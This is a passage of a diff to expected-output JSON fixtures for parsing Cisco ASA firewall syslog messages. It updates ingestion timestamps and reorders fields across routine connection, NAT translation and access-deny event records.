inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -4885,7 +4885,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099350Z", + "ingested": "2021-12-14T14:39:19.188471161Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4967,7 +4967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099355700Z", + "ingested": "2021-12-14T14:39:19.188471671Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270", "code": "305011", "kind": "event", @@ -5046,7 +5046,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099361500Z", + "ingested": "2021-12-14T14:39:19.188472110Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", "code": "302013", "kind": "event", @@ -5129,7 +5129,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099367200Z", + "ingested": "2021-12-14T14:39:19.188472494Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271", "code": "305011", "kind": "event", @@ -5208,7 +5208,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099373Z", + "ingested": "2021-12-14T14:39:19.188472875Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", "code": "302013", "kind": "event", @@ -5292,7 +5292,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099378800Z", + "ingested": "2021-12-14T14:39:19.188473265Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -5378,7 +5378,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099382900Z", + "ingested": "2021-12-14T14:39:19.188473672Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", "code": "302014", "kind": "event", @@ -5460,7 +5460,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099387500Z", + "ingested": "2021-12-14T14:39:19.188474077Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272", "code": "305011", "kind": "event", @@ -5539,7 +5539,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099392600Z", + "ingested": "2021-12-14T14:39:19.188474461Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", "code": "302013", "kind": "event", @@ -5624,7 +5624,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099397400Z", + "ingested": "2021-12-14T14:39:19.188474848Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", "code": "302016", "kind": "event", @@ -5706,7 +5706,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099403200Z", + "ingested": "2021-12-14T14:39:19.188475241Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273", "code": "305011", "kind": "event", @@ -5785,7 +5785,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099407500Z", + "ingested": "2021-12-14T14:39:19.188476059Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", "code": "302013", "kind": "event", @@ -5810,22 +5810,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -5835,12 +5829,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099411800Z", + "ingested": "2021-12-14T14:39:19.188476525Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30", "code": "305012", "kind": "event", @@ -5854,7 +5851,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -5915,7 +5915,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099416200Z", + "ingested": "2021-12-14T14:39:19.188477060Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277", "code": "305011", "kind": "event", @@ -5994,7 +5994,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099422100Z", + "ingested": "2021-12-14T14:39:19.188477448Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", "code": "302013", "kind": "event", @@ -6019,22 +6019,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6044,12 +6038,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099427800Z", + "ingested": "2021-12-14T14:39:19.188477825Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30", "code": "305012", "kind": "event", @@ -6063,25 +6060,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6091,12 +6085,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099433800Z", + "ingested": "2021-12-14T14:39:19.188478335Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30", "code": "305012", "kind": "event", @@ -6110,25 +6107,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6138,12 +6132,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099439600Z", + "ingested": "2021-12-14T14:39:19.188478733Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30", "code": "305012", "kind": "event", @@ -6157,25 +6154,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6185,12 +6179,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099445400Z", + "ingested": "2021-12-14T14:39:19.188479493Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30", "code": "305012", "kind": "event", @@ -6204,25 +6201,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6232,12 +6226,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099451100Z", + "ingested": "2021-12-14T14:39:19.188479880Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30", "code": "305012", "kind": "event", @@ -6251,25 +6248,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6279,12 +6273,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099456800Z", + "ingested": "2021-12-14T14:39:19.188480270Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30", "code": "305012", "kind": "event", @@ -6298,7 +6295,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -6362,7 +6362,7 @@ "severity": 6, "duration": 325000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099462500Z", + "ingested": "2021-12-14T14:39:19.188480657Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", "code": "302014", "kind": "event", @@ -6447,7 +6447,7 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099468200Z", + "ingested": "2021-12-14T14:39:19.188481046Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", "code": "302014", "kind": "event", @@ -6529,7 +6529,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099490100Z", + "ingested": "2021-12-14T14:39:19.188481436Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278", "code": "305011", "kind": "event", @@ -6608,7 +6608,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099512400Z", + "ingested": "2021-12-14T14:39:19.188481904Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", "code": "302013", "kind": "event", @@ -6691,7 +6691,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099518200Z", + "ingested": "2021-12-14T14:39:19.188482302Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6772,7 +6772,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099577300Z", + "ingested": "2021-12-14T14:39:19.188482691Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6853,7 +6853,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099586Z", + "ingested": "2021-12-14T14:39:19.188483077Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6934,7 +6934,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099590Z", + "ingested": "2021-12-14T14:39:19.188483465Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7015,7 +7015,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099596200Z", + "ingested": "2021-12-14T14:39:19.188483917Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7096,7 +7096,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099601200Z", + "ingested": "2021-12-14T14:39:19.188484310Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7177,7 +7177,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099606800Z", + "ingested": "2021-12-14T14:39:19.188484705Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7258,7 +7258,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099612900Z", + "ingested": "2021-12-14T14:39:19.188485097Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7339,7 +7339,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099618800Z", + "ingested": "2021-12-14T14:39:19.188485479Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7420,7 +7420,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099639800Z", + "ingested": "2021-12-14T14:39:19.188485865Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7501,7 +7501,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099645500Z", + "ingested": "2021-12-14T14:39:19.188486325Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7582,7 +7582,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099667900Z", + "ingested": "2021-12-14T14:39:19.188486765Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7663,7 +7663,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099673500Z", + "ingested": "2021-12-14T14:39:19.188487154Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7744,7 +7744,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099679200Z", + "ingested": "2021-12-14T14:39:19.188487667Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279", "code": "305011", "kind": "event", @@ -7823,7 +7823,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099684800Z", + "ingested": "2021-12-14T14:39:19.188488054Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", "code": "302013", "kind": "event", @@ -7906,7 +7906,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099688900Z", + "ingested": "2021-12-14T14:39:19.188488430Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190", "code": "305011", "kind": "event", @@ -7985,7 +7985,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099692300Z", + "ingested": "2021-12-14T14:39:19.188488827Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8070,7 +8070,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099696600Z", + "ingested": "2021-12-14T14:39:19.188489217Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", "code": "302016", "kind": "event", @@ -8153,7 +8153,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099701700Z", + "ingested": "2021-12-14T14:39:19.188489602Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8238,7 +8238,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099706500Z", + "ingested": "2021-12-14T14:39:19.188489996Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", "code": "302016", "kind": "event", @@ -8320,7 +8320,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099712200Z", + "ingested": "2021-12-14T14:39:19.188490385Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280", "code": "305011", "kind": "event", @@ -8399,7 +8399,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099716400Z", + "ingested": "2021-12-14T14:39:19.188490771Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", "code": "302013", "kind": "event", @@ -8482,7 +8482,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099720700Z", + "ingested": "2021-12-14T14:39:19.188491285Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281", "code": "305011", "kind": "event", @@ -8561,7 +8561,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099724100Z", + "ingested": "2021-12-14T14:39:19.188491669Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", "code": "302013", "kind": "event", @@ -8647,7 +8647,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099728400Z", + "ingested": "2021-12-14T14:39:19.188492054Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", "code": "302014", "kind": "event", @@ -8729,7 +8729,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099734100Z", + "ingested": "2021-12-14T14:39:19.188492437Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282", "code": "305011", "kind": "event", @@ -8808,7 +8808,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099739700Z", + "ingested": "2021-12-14T14:39:19.188492816Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", "code": "302013", "kind": "event", @@ -8894,7 +8894,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099745700Z", + "ingested": "2021-12-14T14:39:19.188493437Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", "code": "302014", "kind": "event", @@ -8976,7 +8976,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099753700Z", + "ingested": "2021-12-14T14:39:19.188493843Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283", "code": "305011", "kind": "event", @@ -9055,7 +9055,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099759600Z", + "ingested": "2021-12-14T14:39:19.188494232Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", "code": "302013", "kind": "event", @@ -9141,7 +9141,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099765100Z", + "ingested": "2021-12-14T14:39:19.188494612Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", "code": "302014", "kind": "event", @@ -9226,7 +9226,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099770800Z", + "ingested": "2021-12-14T14:39:19.188495272Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", "code": "302014", "kind": "event", @@ -9308,7 +9308,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099776400Z", + "ingested": "2021-12-14T14:39:19.188495662Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284", "code": "305011", "kind": "event", @@ -9387,7 +9387,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099781900Z", + "ingested": "2021-12-14T14:39:19.188496055Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", "code": "302013", "kind": "event", @@ -9473,7 +9473,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099787400Z", + "ingested": "2021-12-14T14:39:19.188496435Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", "code": "302014", "kind": "event", @@ -9555,7 +9555,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099793Z", + "ingested": "2021-12-14T14:39:19.188496822Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285", "code": "305011", "kind": "event", @@ -9634,7 +9634,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099798500Z", + "ingested": "2021-12-14T14:39:19.188497208Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", "code": "302013", "kind": "event", @@ -9717,7 +9717,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099804100Z", + "ingested": "2021-12-14T14:39:19.188497720Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286", "code": "305011", "kind": "event", @@ -9796,7 +9796,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099832200Z", + "ingested": "2021-12-14T14:39:19.188498844Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", "code": "302013", "kind": "event", @@ -9879,7 +9879,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099838100Z", + "ingested": "2021-12-14T14:39:19.188499244Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287", "code": "305011", "kind": "event", @@ -9958,7 +9958,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099842800Z", + "ingested": "2021-12-14T14:39:19.188499637Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", "code": "302013", "kind": "event", @@ -10041,7 +10041,7 @@ }, "event": { "severity": 